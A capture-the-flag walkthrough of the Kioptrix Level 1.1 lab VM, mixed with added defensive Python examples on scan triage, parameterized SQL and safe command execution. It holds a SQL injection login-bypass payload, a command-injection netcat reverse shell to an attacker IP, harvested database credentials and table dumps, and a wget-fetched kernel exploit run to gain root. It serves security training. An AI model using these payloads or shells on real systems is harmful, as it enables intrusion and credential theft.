published on in writeup
tags: kioptrix

Kioptrix Level 1.1

This is a walkthrough of how I completed Kioptrix Level 1.1. The goal of the challenge is to obtain the flag.

Nmap

# nmap -n -sV -A -p- 192.168.1.121

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            822/udp  status
|_  100024  1            825/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-07T23:10:47+00:00
|_Not valid after:  2010-10-07T23:10:47+00:00
|_ssl-date: 2014-04-24T00:38:09+00:00; +3h59m58s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: 403 Forbidden
825/tcp  open  status   1 (RPC #100024)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            822/udp  status
|_  100024  1            825/tcp  status
3306/tcp open  mysql    MySQL (unauthorized)
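
The scan above already contains the findings a defender would flag first: an SSH daemon that still accepts protocol 1, SSLv2 offered on 443, a certificate that expired years before the scan date, and a CUPS listener advertising PUT. The following triage script is an added example (not part of the original writeup); it parses an abridged copy of the Nmap text output shown above, which is embedded inline as its constructed input, and reports those findings per port. The finding labels are my own naming.

```python
"""Triage of Nmap text output: flag legacy-protocol and certificate findings.
Added example; the input below is an abridged copy of the scan in the writeup."""
import re
from datetime import datetime, timezone

# Constructed input: abridged from the Nmap output shown above.
NMAP_OUTPUT = """\
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| Not valid before: 2009-10-07T23:10:47+00:00
|_Not valid after:  2010-10-07T23:10:47+00:00
|_ssl-date: 2014-04-24T00:38:09+00:00; +3h59m58s from local time.
| sslv2:
|   SSLv2 supported
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
3306/tcp open  mysql    MySQL (unauthorized)
"""

# One port line: "<port>/<proto>  <state>  <service>  <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Group the text output into {port: {"service", "version", "scripts"}}.
    Lines beginning with '|' are NSE script output for the preceding port."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            ports[current] = {"service": m.group(4),
                              "version": m.group(5).strip(),
                              "scripts": []}
        elif line.startswith("|") and current is not None:
            ports[current]["scripts"].append(line.lstrip("|_ ").strip())
    return ports


def triage(text):
    """Return a list of (port, finding) pairs worth raising from the scan."""
    ports = parse_ports(text)
    # Use the server's reported ssl-date as the scan time; fall back to now.
    m = re.search(r"ssl-date:\s*(\S+);", text)
    scan_time = (datetime.fromisoformat(m.group(1)) if m
                 else datetime.now(timezone.utc))
    findings = []
    for port, info in ports.items():
        scripts = info["scripts"]
        if any("Server supports SSHv1" in s for s in scripts):
            findings.append((port, "SSHv1 enabled"))
        if any(s == "SSLv2 supported" for s in scripts):
            findings.append((port, "SSLv2 enabled"))
        if any("Potentially risky methods" in s for s in scripts):
            findings.append((port, "risky HTTP methods advertised"))
        for s in scripts:
            if s.startswith("Not valid after:"):
                expiry = datetime.fromisoformat(s.split(":", 1)[1].strip())
                if expiry < scan_time:
                    findings.append((port, "TLS certificate expired"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(NMAP_OUTPUT):
        print(f"{port:>5}  {finding}")
```

The parser keys on the port line format and treats every following `|` line as belonging to that port, which is how Nmap lays out NSE results; the expiry check compares against the server-reported ssl-date so the result does not drift with the clock of whoever reruns it.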

SQL Injection Login Bypass

I went and had a look at the Apache service running on port 80, and was greeted with a login page.

After a few attempts, I was able to bypass this login page by using SQL Injection.

Username: admin
Password: ' or '1'='1

This took me to another page, with a ping webapp.
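
The bypass above works because the login page splices the submitted password straight into its SQL string, so the quote closes the literal and the `or '1'='1` makes the WHERE clause true for every row. The example below is added here and is not the Kioptrix index.php; it uses an in-memory SQLite table with a constructed user so the same input can be tried against a string-built query and a parameterized one side by side.

```python
"""Login check: string-built query beside a parameterized one.
Added example using SQLite, not the webapp code from the machine."""
import sqlite3


def make_db():
    """Constructed sample table; the real webapp schema is not shown in the writeup."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'example-password')")  # constructed
    return db


def vulnerable_query(username, password):
    """The SQL a string-formatting login produces for the given input."""
    return ("SELECT username FROM users WHERE username='%s' AND password='%s'"
            % (username, password))


def login_vulnerable(db, username, password):
    """Input becomes SQL syntax: a password of  ' or '1'='1  turns the
    predicate into  password='' or '1'='1'  which matches every row."""
    return db.execute(vulnerable_query(username, password)).fetchone() is not None


def login_safe(db, username, password):
    """Bound parameters: values travel separately from the statement, so a
    quote character in the input is only ever compared, never parsed."""
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    injected = "' or '1'='1"
    print(vulnerable_query("admin", injected))
    print("vulnerable:", login_vulnerable(db, "admin", injected))
    print("safe:      ", login_safe(db, "admin", injected))
```

With the correct password both functions return True; with the injected string only the string-built version does. A production login would compare a password hash rather than the plaintext column used here, but the parameter binding is the part that closes this bypass.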

Command Injection

Entering 127.0.0.1 in this box gave me the expected output.

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.064 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.051 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.047 ms

By inserting a semi-colon (;) into the input field, I was able to append additional commands. I used this to check for netcat, then to obtain a remote shell.

;/usr/local/bin/nc 192.168.1.120 4444 -e '/bin/bash'
pwd
/var/www/html
ls -la
total 24
drwxr-xr-x  2 root root 4096 Oct  8  2009 .
drwxr-xr-x  8 root root 4096 Oct  7  2009 ..
-rwxr-Sr-t  1 root root 1733 Feb  9  2012 index.php
-rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php
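
The ping form falls to the semi-colon because the submitted address is concatenated into a shell command line, so the shell sees two commands instead of one. The example below is added here and is not pingit.php; it shows the string-built command beside a version that validates the input as a literal IP address and hands an argv list to the process without any shell, and it rejects the injected input rather than passing it through.

```python
"""Ping form input handling: shell string concatenation beside strict
validation with an argv list. Added example, not the machine's PHP."""
import ipaddress
import subprocess


def build_vulnerable_command(host):
    """String concatenation as a shell command: a ';' in the input ends the
    ping command and the shell runs whatever follows it."""
    return "ping -c 3 " + host


def validate_host(host):
    """Accept only a literal IPv4 or IPv6 address; anything else raises ValueError."""
    return str(ipaddress.ip_address(host.strip()))


def build_safe_command(host):
    """Validated address placed in an argv list: no shell parses it, so
    metacharacters carry no meaning even if validation were looser."""
    return ["ping", "-c", "3", validate_host(host)]


def is_rejected(host):
    """True when the input would not be accepted by the validating path."""
    try:
        validate_host(host)
        return False
    except ValueError:
        return True


def run_ping(host, timeout=10):
    """Run the validated command without a shell and return its stdout."""
    result = subprocess.run(build_safe_command(host), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout


if __name__ == "__main__":
    injected = "127.0.0.1; id"
    print("shell string:", build_vulnerable_command(injected))
    print("rejected:    ", is_rejected(injected))
    print("argv:        ", build_safe_command("127.0.0.1"))
    try:
        print(run_ping("127.0.0.1"))
    except FileNotFoundError:
        print("ping binary not available on this host")
```

The two layers are independent: the address check stops the injected input at the door, and the argv list means that even a value which slipped past validation would reach ping as a single argument rather than be interpreted by a shell.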

Exploring MySQL

I used the shell to read index.php, the page that handled the original login, and obtained the username and password it uses to connect to the database. I spent some time exploring the databases within.

head index.php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
mysql --user=john --password=hiroshima -e "show databases;"
mysql --user=john --password=hiroshima -e "use mysql; show tables;"
mysql --user=john --password=hiroshima -e "use mysql; select * from user;"
mysql --user=john --password=hiroshima -e "use mysql; select user, password from user;"
mysql --user=john --password=hiroshima -e "use webapp; show tables;"
mysql --user=john --password=hiroshima -e "use webapp; select * from users;"

Privilege Escalation

In the end, I found a local kernel exploit that worked nicely in elevating my shell to root. I transferred the exploit by hosting it on my own Apache server and fetching it with wget. It was then compiled with gcc and run.

wget http://192.168.1.120/x.c -O x.c
gcc x.c -o x
./x
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# cat /root/.mysql_history